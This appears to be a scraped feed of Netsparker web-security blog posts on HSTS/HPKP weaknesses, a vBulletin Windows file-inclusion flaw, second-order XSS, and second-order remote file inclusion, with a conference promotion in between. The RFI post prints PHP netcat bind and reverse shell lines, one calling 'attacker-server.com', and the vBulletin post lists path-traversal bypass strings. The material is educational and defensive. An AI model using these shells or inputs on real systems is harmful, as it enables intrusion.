    Perhaps you're thinking: "But, I could just disable port 80. I could set up a routing process on the server side.". The problem is that this still won't be enough to emulate the features HSTS provides. Let's take a closer look. Assume that you disable port 80 and start accepting connections only through port 443. A hacker could establish a secure connection between himself and the user's browser, and between your site and himself, and present a fake certificate to the browser – a classic MiTM attack. There is one exception: browsers have mechanisms to prevent this type of attack.

    For instance, if the certificate is invalid or expired, or has a weak cipher, browsers will warn the user that something went wrong. The problem is that users can simply choose to ignore these warnings by clicking the Add Exception or Go Anyway buttons. Users are not always technically savvy. If you are unfamiliar with computers, and there is a warning with technical details such as 'ERR_CERT_AUTHORITY_INVALID', it's close to impossible to find out what's going on. However, if there is a button on the page that lets you continue to the site despite the error, why not just click it?

    When the HSTS header is set for a web application, the user's browser converts HTTP links that reference the web application to their secure HTTPS equivalent, at least for the time specified in the max-age option of the HSTS header. But more importantly, if a browser encounters invalid certificates, the Add Exception and Go Anyway buttons are disabled, which means that there is no way for users to ignore these errors. You might argue that the TLS warnings in most browsers are clear indicators that something is wrong and that you shouldn't continue. And that's probably true for a majority of users. However, sometimes you need to make sure that users don't even have the option to ignore the warnings in security-critical applications. Banking, insurance and e-commerce web applications are just a few examples of the types of websites that can benefit from HSTS.

    This should account for any mistakes that users could possibly make, but what if the mistake is a little bit higher up the chain of trust? Let's say one of the certificate authorities in the browser trust chain is hacked, and a certificate is signed on behalf of your website? It is obvious that none of the security benefits of the HSTS header apply here, since the attacker is in possession of a valid certificate. This scenario seems far fetched, but in 2011, Dutch certificate issuer DigiNotar was hacked and 500 certificates were signed in their name by attackers. Google quickly discovered the fake certificates via the Public Key Pinning feature they built into Chrome for Google domains. In the process, they removed DigiNotar from their list of trusted certificate issuers and the company was declared bankrupt the very same month! This highlights a few salient points about TLS: browser vendors take vulnerabilities regarding encryption very seriously, they hold certificate issuers to high standards and they won't fail to punish those who don't comply with them – by no longer trusting the certificates they've signed.

    Certificate Transparency

    When a Certificate Authority (CA) signs a certificate for a site, currently it is not required to notify the owner of that site. This is obviously a problem and shouldn't be the standard. However, there is now a mechanism that will submit each issued TLS certificate to a public log. It's called Certificate Transparency (CT). While purely voluntary for now, it will become mandatory in the near future. The CT program will provide an open and almost real-time monitoring system for TLS certificates, making it more difficult both for CAs to erroneously issue them and for hackers to illegitimately acquire them.

    HTTP Public Key Pinning

    For now, though, how do we get ahead of this problem? How do we prevent hackers from signing certificates on behalf of our web pages – without our permission?

    Unfortunately, we can't! However, what we can do is prevent the use of these certificates, thanks to HTTP Public Key Pinning (HPKP) technology– at least for now. The problem with HPKP is that it's incredibly difficult for the average webmaster to achieve. If you do something wrong, you might render your website useless for a very long time and there is nothing you can do about it. To understand why, we need to take a look at how HPKP works.

    Since Google Chrome 13, websites can send their certificate's public key fingerprint (a hash of the server's public TLS key) to the browser using the Public Key Pinning HTTP response header. Browsers store these fingerprints locally, together with the hostname to which they belong. When a user establishes a connection to the website, and the browser encounters a certificate other than the pinned one, it refuses to establish a secure connection, or even report the URL to a designated endpoint on the server using the report-uri field. The Public Key Pinning feature allows us to protect our users and websites in a circumstance in which the authorities required to secure communications are somehow duped into signing a fake certificate.

    So what happens if you lose access to your private key? The simple answer is: Every user who already has visited your website will lose access to it for as long as the public key is pinned. Whenever they want to visit your website again, they will receive an error message, because the public key does not match the pinned one. This is why browser vendors need an alternative to HPKP that wouldn't affect users too much. In the case of HPKP deprecation, you can either:

    • Rely on the CA to respect the choice of authority allowed in the CAA DNS entry, or
    • Check the CT log to determine whether there is a certificate signed on behalf of your site through one of the CT websites such as crt.sh

    The Certificate Transparency program becomes mandatory from April 2018. Google has announced that each certificate to be signed must be included in this list, otherwise the connection will be refused by the browser. If a ten-year certificate was signed on your behalf prior to 2018, you can block these cases by configuring the Expect-CT header to the Enforce mode.

    The advantage of having two security headers is that it enforces certain browser behavior within the time (in seconds) specified in the max-age directive. For this reason, it is necessary to update max-age by responding with the HSTS and HPKP headers each time.

    If any of the local HSTS or HPKP records that browsers store on the user's file system are deleted or expire, these strict security mechanisms will obviously have no effect. Did we say they can be deleted? Yes!

    According to a presentation delivered by ElevenPaths at Black Hat 2017, it is possible to wipe or disable the cache of HSTS records in all major browsers (i.e. Firefox, Google, Edge and IE). This is done by exceeding the available space for these lists.

    In Google Chrome, we can query the HSTS and HPKP lists from chrome://net-internals/#hsts. Unfortunately in Firefox there is no way to view these lists. However, you can access them using the PinPatrol addon which was developed by ElevenPaths.

    Firefox uses a TXT file limited to 1024 lines to manage HSTS and HPKP lists. PinPatrol's Firefox addon can also display this TXT file.

    You might think that 1024 entries are more than enough for a regular user. However, for an attacker who wants to push the limits, it is exactly this limit that can be used as a vector for new attacks.

    How Can Hackers Use Firefox's Score Value?

    When more than 1024 entries are entered, Firefox deletes the old entries in the list to make space for new ones. And, Firefox uses an interesting detail: the Score value. The Score value indicates how often a site has been visited by a user on different days. For example, if a site is visited by a user for the first time (or if the values which are set by the site have expired) this value is set to '0'. If it is visited again the next day, the value is updated to '1'. On a subsequent visit on another day, it is updated to '2'. This value is updated every time a user visits a site. When the list reaches a size of 1024 lines, it deletes the record with the lowest Score to make space for new entries.

    The researchers from ElevenPaths used the site cloudpinning.com, and wrote JavaScript code that would open a connection to 1500 of its subdomains. For each of them, they issued a new HSTS header. As you might imagine, this would flush all the entries with a score of '0' out of the previous list. This is exactly what happened. When they stuffed 1500 subdomains into a list that could only hold 1024, the records with the lowest scores were deleted.

    Can website records with a Score value of '1' or higher also be deleted? Researchers repeated the same attack the next day, raising the Score of the subdomains of cloudpinning.com by one point. They were able to delete records where the Score value was '0' or '1'.

    But how realistic is it that they were able to repeat the same attack on another day? The researchers recommend Delorean, an Network Time Protocol (NTP) MiTM tool instead. However, NTP is a relatively old protocol; it predates SSL by about ten years. It is, therefore, easy to manipulate the time on some Mac and Linux machines, just by intercepting NTP traffic and sending back the wrong timestamps to the machines. For more information about Delorean, see Bypassing HTTP Strict Transport Security, a study written by Jose Selvi for Black Hat 2014.

    What Happens When Records are Deleted?

    HSTS and HPKP headers are valid starting from the date they were added to the list, and expire after the time specified in the max-age header. But, once they are deleted from the list, there is no way for the browser to remember whether or not the site previously sent a HSTS header. Therefore it becomes possible to conduct an MiTM attack.

    What About the Chrome and Edge Browsers?

    There is no concept similar to the Score value, or any site record limit, in Chrome. Instead Chrome simply stores the HSTS and HPKP values in a JSON file: C:\Users\USERNAME\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity. In theory, you could enter an infinite amount of records into this file either through an MiTM attack or simply using your own server, as explained above. However, in practice, limitations are imposed by the available memory on the victim's machine.

    Currently, what an attacker can do is make the browser issue thousands of requests, each one containing the maximum amount of public key pins and an HSTS header. During their tests, researchers found that after about ten minutes, the JSON file reached an approximate size of 500 MB, the browser froze and it was rendered useless. Even restarting the browser could not return it to its usable state, and their only option was to delete the JSON file.

    IE/Edge

    There is an API, or function, that manages the HSTS list for IE and Edge browsers. It is called HttpIsHostHstsEnabled and is stored in the WININET.DLL file. Unfortunately there is no formal documentation for it.

    Microsoft stores the HSTS data in a database called the Extensible Storage Engine (ESE). The data used by this database is stored in the WebCache directory, under the user profile directory, with the name WebCacheV01.dat. However, as with its counterparts in Chrome and Firefox, the storage mechanism is far from perfect.

    For some reason, HSTS does not work as expected in the IE/Edge browser. The table only contains the data of the most popular domains.

    When the researchers sent a 131 request to their test site (cloudpinning.com) they noticed that there was no change in the HSTS table, even when they restarted both the browser and the computer.

    What is the Solution?

    If it wasn't for the above-mentioned vulnerabilities, HSTS would sound like a great invention. Even though just a few years ago almost every connection that your browser established with a website was completely unencrypted, browser vendors now take TLS bugs very seriously. It comes as no surprise that browser vendors have already taken precautions that counter the shortcomings of HSTS. The solution comes in the form of Preload Lists.

    Netsparker - HSTS Preload List

    An HSTS Preload List is a file that is delivered together with your browser when you download it. Instead of relying on a dynamic list, like the ones that the researchers showed to be vulnerable, the site that should be protected by HSTS security features is included directly in the browser's source. Therefore there is no reliance on the the Trust On First Use protocol. Instead, the browser immediately knows that the site wants HSTS to be enabled. However, to qualify for inclusion in an HSTS Preload List, your site must have the following criteria:

    1. A valid TLS certificate
    2. Use of the same host when redirecting from HTTP to HTTPS
    3. All subdomains must be served over a secure connection, including www
    4. The max-age value in the HSTS header must be set to at least 18 weeks (i.e. 10886400 seconds), include subdomains, and preload options must be in the HSTS header:

    Strict-Transport-Security: max-age=10886400; includeSubDomains; preload

    For further information, see the slides the researchers published for Black Hat EU 2017, Breaking Out HSTS (and HPKP) on Firefox, IE/Edge and (Possibly) Chrome.

    Two Critical Vulnerabilities in vBulletin

    vBulletin is a very popular forum script which is also commonly found on websites in the Alexa Top 1 Million.

    According to an independent researcher's report vBulletin contains both a local file inclusion (LFI) vulnerability as well as an arbitrary file deletion vulnerability. The most striking aspect of the report is that the researchers have been trying to reach vBulletin's developers since November 21, 2017, but they have been unable to secure a response! Consequently, there is no published patch for these vulnerabilities.

    In this section, we will only focus on the details of the LFI vulnerability.

    The Cause of the Local File Inclusion Vulnerability

    The GET parameter vulnerable to the LFI is called routeString. Whenever you pass that parameter to the index.php file, vBulletin conducts a variety of checks on the value. It checks whether or not the supplied value contains one or more forward slashes, or whether you've attempted to pass the path to a gif, png, jpg, css or js file. In order to detect this, it will simply check for the value following the final period (.) character.

    This table below shows how it works.

    String

    Passes

    Reason

    index.php

    Yes

    No '/' or forbidden extensions

    test.gif

    No

    The file has the extension 'gif' after the final period

    ../../etc/passwd

    No

    There are forward slashes

    ....\\logs\\access.log

    Yes

    No forbidden extensions, or forward slashes

    test.gif.

    Yes

    No forbidden extensions after the final period


    As you see, the first three rows don't yield any surprises. Index.php is allowed, as expected, and the other two are blocked. The last two, however, are unintended. Let's start with the test.gif. input. Why does it pass the check?

    As mentioned, vBulletin only checks whether or not there is a forbidden extension after the final period. However, since there is another period right after the gif extension, vBulletin will return an empty string. This would probably be the correct check on a Linux system, but it doesn't take into consideration that in Windows, there is certain behaviour that doesn't play along. When Windows encounters a file that has one or more trailing dots, it simply strips all of them out. So, while vBulletin sees a file called 'test.gif.' with a trailing dot, Windows returns the content of 'test.gif' instead. This means that the extension check is bypassed.

    But why does '..\something' also pass the check? Unfortunately, vBulletin has, yet again, forgotten to take the Windows file system into consideration. While banning the use of forward slashes might be enough to prevent LFI in a Linux environment, in Windows, backslashes can have the exact same purpose (directory separators). That's why the LFI vulnerability is restricted to Windows machines and why this particular input works and bypasses the filter. If you included a file like the server's access log, you could turn a simple file inclusion into a remote code execution.

    To learn more about the details of this LFI, see SSD Advisory – vBulletin routestring Unauthenticated Remote Code Execution.

    Security Researchers Need to be More Creative!

    Among web security professionals there is an important rule: Do not trust data from the user!

    But user data doesn't necessarily mean a POST parameter or some JSON data. Instead, user-controlled values can occur in the strangest of places. We generally refer to them as 'second order' vulnerabilities, and Robert Salgado has shown a few unexpected sources of user input that lead to real life vulnerabilities.

    In the first example in the report, the researcher gave an example of how an XSS payload was injected into the PowerDNS web interface – through DNS queries! Within the blog post they show how an attacker might issue a DNS query containing an XSS payload. You will see that the payload that the researcher was sending via a DNS query was executed in the PowerDNS console.

    In the second example, the researcher explained the impact of a vulnerability in the SSL Tester tool, which Robert Salgado reported to Symantec three years ago. If you upload an SSL certificate, whose common name contains an XSS payload the website would reflect it back to you without sanitizing the output – a classic XSS vulnerability. The screenshot in the researcher's write-up illustrates that the payload was executed. It shows the content of the user's cookies in an alert popup.

    The final example provided by the researcher is the Rough Auditing Tool for Security (RATS) application developed by CERN's Computer Security Department. It is a static code analysis program that has not been updated since 2013. The program can generate a report in HTML format. Unfortunately, this feature of the application can also be used as an attack vector for XSS payloads. As illustrated in the article, the attacker uses XSS payloads as file names in the operating system. You can see this if you enter the ls -l command. In order to exploit this, you have to scan a malicious application using the analysis tool, that contains an XSS payload in one of its filenames. In the screenshot included in his write-up, you can see that the XSS payload was executed successfully. The alert popup displays the text specified in the payload.

    The moral of the story is:

    • Code injections are not always executed via HTTP requests
    • Practically every point in the file system (i.e. log, API messages or database records) can be attacked, and these points should be all be taken into consideration
    • It is necessary to apply sanitization depending on the context

    Netsparker Sponsors OWASP AppSec California 2018

    $
    0
    0

    OWASP AppSec California 2018 Logo

    Netsparker is sponsoring and exhibiting at OWASP AppSec California 2018. The conference will be held on January 30-31 at the Annenberg Community Beach House, Santa Monica, California.

    Join Us at Booth 27 at OWASP AppSec California 2018

    Come and visit us at Booth 27 in the exhibitor area, to learn how our Proof-Based Scanning Technology can help you save both time and money when automatically detecting vulnerabilities in the OWASP Top 10 list.

    For more information about the conference, visit the official OWASP AppSec California 2018 website.

    30% Off Promotional Code for OWASP AppSec California 2018!

    Use the Promotional Code Netsparker30OFF when buying your OWASP AppSec California 2018 Conference Ticket to get a 30% discount.

    Second-Order Remote File Inclusion (RFI) Vulnerability Introduction & Example

    $
    0
    0

    The main difference between a Remote File Inclusion (RFI) vulnerability and a second-order one is that in a second-order RFI, attackers do not receive an instant response from the web server, so it is more difficult to detect. This is because the payload that the attacker uses to exploit the vulnerability is stored and executed at a later stage.

    Exploiting a Second-Order Remote File Inclusion Vulnerability

    Imagine a website that allows users to submit links through a web form. These submissions are later reviewed by a moderator, on a control panel that directly adds the remote content into the page. If an attacker manages to use the form to submit a remote website containing a dangerous payload, this payload will be executed once the moderator opens the page.

    This means that the attacker's included will still be executed on the web server. However the attacker can not use a guided web shell with a user interface to issue commands, as the admin is the only one who would see the output. So they have to resort to alternative techniques, such as spawning a bind or reverse shell.

    A bind shell listens on a specific web server port and binds a shell (such as Bash) to it. Once the attacker connects, they are able to execute commands. This will not work, however, if a firewall is in place that prevents non-whitelisted ports from receiving incoming connections.

    <?php
    system(‘nc -lp 4444 -e /bin/bash’);

    A reverse shell does the same, but instead of listening on the web server, it actively initiates a connection to the attacker’s machine. This bypasses the firewall rule, since this connection is outgoing, not incoming.

    <?php
    system(‘nc attacker-server.com 4444 -e /bin/bash’);

    Another method, which is often used in automated exploitation by malicious hackers, is hard-coding the command that installs malware on the server into the included file, without further possibility of interaction. The malware in this case is often a piece of code that connects back to a command and control server, awaiting further instructions.

    How Does Netsparker Detect Second-Order RFI Attacks?

    This screenshot shows the RFI vulnerability as reported in Netsparker Desktop.

    This screenshot shows the RFI vulnerability as reported in Netsparker Desktop.

    As with other second-order and blind web application vulnerabilities, the Netsparker web application security solution probes the web application and sends a payload with a custom hash. That hash is used as a subdomain of our Netsparker Hawk testing infrastructure, which results in a URL like this:

    b92e8649b6cf4886241a3e0825bd36a262b24933.r87.me

    When the file inclusion is triggered at a later time, the vulnerability is exploited as follows:

    1. The web server tries to include a file under b92e8649b6cf4886241a3e0825bd36a262b24933.r87.me
    2. The Netsparker Hawk server responds with another payload containing code, which forces the web server to resolve yet another custom subdomain

    If the second DNS query is successful, Netsparker will confirm the blind RFI.

    Viewing all 1027 articles
    Browse latest View live